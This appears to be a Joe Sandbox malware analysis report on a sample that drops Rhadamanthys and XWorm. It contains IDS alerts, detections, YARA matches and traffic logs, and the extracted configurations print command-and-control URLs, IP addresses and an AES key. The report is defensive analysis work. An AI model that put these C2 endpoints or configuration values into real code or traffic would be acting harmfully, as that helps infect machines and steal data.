                      SID:2853193
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:07.680138+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49746
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:26:53.831904+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49753
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:25:33.369248+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:00.917898+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:40.797989+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49760
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:25:20.554917+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:17.536001+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:57.536064+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:22.311512+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:46.292252+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49734
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:24:42.457944+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:48.876419+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:09.050707+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:48.879074+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:05.821094+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:26:14.309050+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49747
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:25:20.493111+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:27:29.786129+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:26.490485+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49728
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:26:47.223099+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49752
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:27:00.478416+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49754
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:26:34.056313+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49750
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:25:58.629118+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:23:40.370278+0200
                      SID:2854802
                      Severity:1
                      Source Port:2047
                      Destination Port:49706
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:26:04.673062+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:34.788787+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:20.104509+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49727
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:24:52.951046+0200
                      SID:2854802
                      Severity:1
                      Source Port:443
                      Destination Port:49735
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:24:07.411768+0200
                      SID:2854802
                      Severity:1
                      Source Port:2047
                      Destination Port:49723
                      Protocol:TCP
                      Classtype:Domain Observed Used for C2 Detected
                      Timestamp:2024-08-27T18:24:07.411768+0200
                      SID:2854824
                      Severity:2
                      Source Port:2047
                      Destination Port:49723
                      Protocol:TCP
                      Classtype:Potentially Bad Traffic
                      Timestamp:2024-08-27T18:25:58.631925+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:25:56.693091+0200
                      SID:2852870
                      Severity:1
                      Source Port:6677
                      Destination Port:49726
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:54.131663+0200
                      SID:2852923
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected
                      Timestamp:2024-08-27T18:24:30.688337+0200
                      SID:2855924
                      Severity:1
                      Source Port:49726
                      Destination Port:6677
                      Protocol:TCP
                      Classtype:Malware Command and Control Activity Detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\cfiAvira: detection malicious, Label: HEUR/AGEN.1305769
                      Source: C:\Users\user\AppData\Local\Temp\tqcoAvira: detection malicious, Label: HEUR/AGEN.1305769
                      Source: 00000020.00000002.1996496863.00000000052DB000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Rhadamanthys {"C2 url": "https://154.216.19.149:2047/888260cc6af8f/07djb4gj.jifud"}
                      Source: 00000019.00000002.3766821762.00000000029A1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": "https://pastebin.com/raw/jxfGm9Pc", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\Temp\cfiJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\tqcoJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeJoe Sandbox ML: detected
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpackString decryptor: https://pastebin.com/raw/jxfGm9Pc
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpackString decryptor: <123456789>
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpackString decryptor: <Xwormmm>
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpackString decryptor: V3
                      Source: 32.2.cmd.exe.31c00c8.0.raw.unpackString decryptor: USB.exe
                      Source: C:\Windows\System32\OpenWith.exeCode function: 17_3_00007DF4218A2258 CryptUnprotectData,17_3_00007DF4218A2258

                      Exploits

                      barindex
                      Source: Yara matchFile source: 23.2.cmd.exe.34407f8.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5152b57.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.cmd.exe.53fcb57.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.510da8a.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.SendBugReportNew.exe.2ec65ce.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.cmd.exe.53fd757.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.cmd.exe.52e1a8a.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 23.2.cmd.exe.53b7a8a.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.cmd.exe.5327757.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.SendBugReportNew.exe.2ec59ce.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 32.2.cmd.exe.5326b57.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 14.2.cmd.exe.5153757.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.SendBugReportNew.exe.2e80901.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000020.00000002.1996496863.00000000052DB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1404272161.0000000002E7A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.1720054061.0000000003440000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000017.00000002.1720436187.00000000053B1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1686907778.0000000005107000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: SendBugReportNew.exe PID: 7368, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7596, type: MEMORYSTR
                      Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: unknownHTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.7:49725 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49724 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49727 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49728 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49732 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49733 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49734 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49735 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49736 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49737 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49738 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49739 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49740 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49741 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49742 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49743 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49744 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49745 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49746 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49747 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49748 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49749 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49750 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49751 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49752 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49753 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49754 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49755 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49756 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49757 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49758 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49759 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 154.216.19.149:443 -> 192.168.2.7:49760 version: TLS 1.2
                      Source: Binary string: wkernel32.pdb source: V3.exe, 0000000A.00000003.1325524956.00000000046F0000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325445545.00000000010D0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329816616.0000000004CF0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329733550.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: V3.exe, 0000000A.00000003.1325726282.0000000004670000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325910067.0000000004890000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1330348319.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1330078113.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: V3.exe, 0000000A.00000003.1324630716.0000000004670000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1324825043.0000000004860000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1328177048.0000000004DC0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1327943327.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: SendBugReportNew.exe, 00000009.00000002.1404881982.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404526602.000000000306B000.00000004.00000020.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325063351.0000000004670000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325220783.0000000004810000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329265416.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329541832.0000000004D70000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686777775.0000000004D58000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1687023022.00000000051F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: V3.exe, 0000000A.00000003.1324630716.0000000004670000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1324825043.0000000004860000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1328177048.0000000004DC0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1327943327.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: SendBugReportNew.exe, 00000009.00000002.1404881982.00000000033C0000.00000004.00000800.00020000.00000000.sdmp, SendBugReportNew.exe, 00000009.00000002.1404526602.000000000306B000.00000004.00000020.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325063351.0000000004670000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325220783.0000000004810000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329265416.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329541832.0000000004D70000.00000004.00000001.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1686777775.0000000004D58000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.1687023022.00000000051F0000.00000004.00001000.00020000.00000000.sdmp
                      Source: Binary string: win32u.pdb source: wmplayer.exe
                      Source: Binary string: wkernel32.pdbUGP source: V3.exe, 0000000A.00000003.1325524956.00000000046F0000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325445545.00000000010D0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329816616.0000000004CF0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1329733550.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: V3.exe, 0000000A.00000003.1325726282.0000000004670000.00000004.00000001.00020000.00000000.sdmp, V3.exe, 0000000A.00000003.1325910067.0000000004890000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1330348319.0000000004DF0000.00000004.00000001.00020000.00000000.sdmp, OpenWith.exe, 0000000D.00000003.1330078113.0000000004BD0000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Windows\System32\OpenWith.exeDirectory queried: number of queries: 1001
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_0040301A GetFileAttributesW,SetLastError,FindFirstFileW,FindClose,CompareFileTime,7_2_0040301A
                      Source: C:\Users\user\Desktop\file.exeCode function: 7_2_00402B79 FindFirstFileW,SetFileAttributesW,lstrcmpW,lstrcmpW,SetFileAttributesW,DeleteFileW,FindNextFileW,FindClose,SetFileAttributesW,RemoveDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,7_2_00402B79
                      Source: C:\Users\user\AppData\Roaming\Javaoraclev4\YIUEROPTJR\V3.exeCode function: 10_2_00C8A165 FindFirstFileExW,10_2_00C8A165
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\System32\OpenWith.exeCode function: 4x nop then dec esp17_3_00007DF4218AE261
                      Source: C:\Windows\System32\OpenWith.exeCode function: 4x nop then dec esp17_2_000001F664380511
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 4x nop then dec esp26_2_00000230766F5641

                      Networking

                      barindex
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:2047 -> 192.168.2.7:49706
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:2047 -> 192.168.2.7:49723
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49724
                      Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 85.209.133.150:6677 -> 192.168.2.7:49726
                      Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 85.209.133.150:6677 -> 192.168.2.7:49726
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49728
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:2047 -> 192.168.2.7:49722
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49727
                      Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49726 -> 85.209.133.150:6677
                      Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49726 -> 85.209.133.150:6677
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49738
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49741
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49732
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49743
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49740
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49746
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49751
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49742
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49733
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49756
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49758
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49736
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49753
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49749
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49748
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49760
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49750
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49739
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49759
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49752
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49747
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49734
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49737
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49755
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49745
                      Source: Network trafficSuricata IDS: 2853193 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49726 -> 85.209.133.150:6677
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49744
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49735
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49754
                      Source: Network trafficSuricata IDS: 2854802 - Severity 1 - ETPRO MALWARE Suspected Rhadamanthys Related SSL Cert : 154.216.19.149:443 -> 192.168.2.7:49757
                      Source: Malware configuration extractorURLs: https://pastebin.com/raw/jxfGm9Pc
                      Source: Malware configuration extractorURLs: https://154.216.19.149:2047/888260cc6af8f/07djb4gj.jifud
                      Source: unknownDNS query: name: pastebin.com
                      Source: global trafficTCP traffic: 154.216.19.149 ports 0,2,443,4,2047,7
                      Source: global trafficTCP traffic: 192.168.2.7:49706 -> 154.216.19.149:2047
                      Source: global trafficTCP traffic: 192.168.2.7:49726 -> 85.209.133.150:6677
                      Source: global trafficHTTP traffic detected: GET /raw/jxfGm9Pc HTTP/1.1Host: pastebin.comConnection: Keep-Alive
                      Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                      Source: Joe Sandbox ViewIP Address: 104.20.4.235 104.20.4.235
                      Source: Joe Sandbox ViewASN Name: SKHT-ASShenzhenKatherineHengTechnologyInformationCo SKHT-ASShenzhenKatherineHengTechnologyInformationCo
                      Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                      Source: Joe Sandbox ViewASN Name: CMCSUS CMCSUS
                      Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                      Source: Joe Sandbox ViewJA3 fingerprint: caec7ddf6889590d999d7ca1b76373b6
                      Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 154.216.19.149:2047 -> 192.168.2.7:49723
                      Source: Network trafficSuricata IDS: 2854824 - Severity 2 - ETPRO JA3 HASH Suspected Malware Related Response : 154.216.19.149:2047 -> 192.168.2.7:49722
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 104.98.116.138
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
                      Source: unknownTCP traffic detected without corresponding DNS query: 20.50.201.200
